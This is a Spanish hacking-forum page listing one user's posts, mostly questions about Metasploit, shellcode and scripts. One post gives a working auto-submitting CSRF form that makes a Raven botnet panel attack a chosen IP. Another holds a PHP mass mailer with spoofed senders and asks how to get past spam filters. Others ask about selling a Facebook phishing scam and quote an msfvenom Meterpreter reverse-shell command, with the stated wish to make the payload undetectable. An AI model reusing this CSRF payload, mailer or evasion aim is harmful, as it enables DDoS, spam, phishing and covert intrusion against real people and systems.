Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Metadato

#1
Buenas a todos, quería preguntar si es posible instalar Metasploit en Archlinux sin tener el modo gráfico instalado.
He estado buscando pero no he tenido éxito con este problema. Agradecería que alguien me pudiera explicar como instalar Metasploit en Archlinux sin utilizar el instalador gráfico (de Metasploit) en Archlinux.

Un saludo. ;D
#2
Bugs y Exploits / CSRF Raven Botnet
Agosto 28, 2013, 01:55:33 PM
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Código: html5

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>


Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Código: html5

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
<input type="hidden" name="target" value="173.194.34.248">
<input type="hidden" name="time" value="500">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>


Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Código: php

echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';


Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D
#3
Pues bueno cuando ejecuto este script me manda los mails a la carpeta de spam, si ustedes me pueden decir en que fallo para que no lo envíe a esa carpeta, aquí les dejo el code, creo que el problema está en las cabeceras por que he probado este mismo script, pero con texto plano y no lo envía a la carpeta de spam, (obviamente retiro las cabeceras de MIME).

Code:

Código: php

<?php

/*

===============================
==  PHP Mailer, by Metadato  ==
===============================

*/

$from_name = $_POST['from_name'];
$from_email = $_POST['from_email'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$cantidad = $_POST['cantidad'];

$headers  = 'MIME-Version: 1.0'."\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1'."\r\n";
$headers .= "From: $from_name < $from_email >";

for($emails = 0; $emails < $cantidad; $emails++) {
mail($to, $subject, $message, $headers);
}
?>


Un  saludo.
#4
Hola a todos, me ha surgido una duda, si yo por ejemplo hago un scam de Facebook, un mailer con un letter de esta red social, y vendo todo eso por una suma de dinero a una persona, y luego a esa persona la denuncian, ¿yo estaría metido tambien por vender estos productos, o vender estos es ilegal?

Saludos.
#5
C / C++ / Calculadora básica en C
Julio 09, 2013, 04:07:33 PM


Hola a todos, pues recien me he introducido en este mundillo del C / C++ y quisiera compartir mi primer trabajillo, y que ustedes me digan posibles fallos que tenga o cosas que pueda mejorar, gracias!!!

Código: c

#include <stdio.h>

int main(){
   printf("####################################\n");
   printf("## Calculadora basica by Metadato ##\n");
   printf("####################################\n");

   char operaciones;
   printf("Suma (S), Resta (R), Multiplicacion (M), Division (D): ");
   scanf("%c",&operaciones);

   switch(operaciones){
    case 'S' :
    int sa,sb;
    printf("Define 2 numeros que quieras sumar:\n");
    scanf("%d %d",&sa,&sb);
    printf("%d + %d = %d",sa,sb,sa+sb);
    break;
    case 'R' :
    int ra,rb;
    printf("Define 2 numeros que quieras restar:\n");
    scanf("%d %d",&ra,&rb);
    printf("%d - %d = %d",ra,rb,ra-rb);
    break;
    case 'M' :
    int ma,mb;
    printf("Define 2 numeros que quieras multiplicar:\n");
    scanf("%d %d",&ma,&mb);
    printf("%d * %d = %d",ma,mb,ma*mb);
    break;
    case 'D' :
    int da,db;
    printf("Define 2 numeros que quieras dividir:\n");
    scanf("%d %d",&da,&db);
    printf("%d / %d = %d",da,db,da/db);
    break;

    default : puts("Error!! Quizas hayas escrito la letra en minuscula...");
   }
    return 0;
}


PD: Se podría cambiar las variables enteras por las de tipo flotante para los decimales.

Saludos!!  8)
#6
Hola a todo Underc0de!! Pues me he dado cuenta de qué ruby es bastante potente, si no me equivoco Metasploit esta codeado en ruby, y se pueden hacer muchos scripts bastantes interesantes, pero por las dudas, ¿si aprendo ruby podré crear mis propios scripts, como por ejemplo, keylogger, capturador de pantalla, hasta que punto es rentable?

Gracias y saludos!!  8)
#7
Hola a todos los usuarios de Underc0de, en esta ocasión les quiero compartir mi duda, por si alguien puede resolverla, el tema va de shellcodes, ya me he informado de que és una shellcode y tal.. Tengo una shellcode maliciosa generada por Metasploit (es un payload de conexión inversa), ¿que código en C / C++ habría que hacer para ejecutar ese shellcode? (si ya se que Metasploit puede generar un ejecutable, también tengo constancia del shellcode2exe, pero yo quiero saber el código en C / C++ que habría que hacer para ejecutar la shellcode para aprender más a fondo el funcionamiento de las shellcodes...)

PD: Si necesitan la shellcode se lo puedo proporcionar...

Saludos!!!
#8
Hola a todos!!! Bien, en esta ocasión tengo una duda que me está comiendo mucho la cabeza, por que busco y busco y no encuentro nada. Mi duda es que método o que hay que hacer para encriptar mi shellcode (de metasploit), he oído de alterar el shellcode pero no tengo ni idea de que hay que hacer, la shellcode a encriptar es la que me da de resultado al tipear lo siguiente en mi terminal: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 C ó msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.XXX LPORT=4444 -f c > shell.c (en C, que vendría a arrojar los mismo)


Las "XXX" las pongo para no poner la ip completa.

Y después de esto, ¿que hago con la shellcode, para hacer un ejecutable de windows?

LA VERDAD SOLO QUIERO TENER MI PAYLOAD FUD.

Saludós!!!
#9
Lo dicho, aquí podréis postear vuestros Add-ons de Mozilla Firefox que usáis habitualmente para penetrar en sistemas..

Si hacemos una recopilación de todos podría ayudar a mucha gente incluido yo, obviamente.


Bueno como reciente he empezado solo tengo: Firebug, Live HTTP Headers, Tamper data y Hackbar.

Un saludo!!
#10
Bueno pues quería que me dijeran como pongo  este link de steaming No tienes permitido ver los links. Registrarse o Entrar a mi cuenta como musia de fondo en mi web y que sea compatible con todos los navegadores.


Gracias, saludos!!!!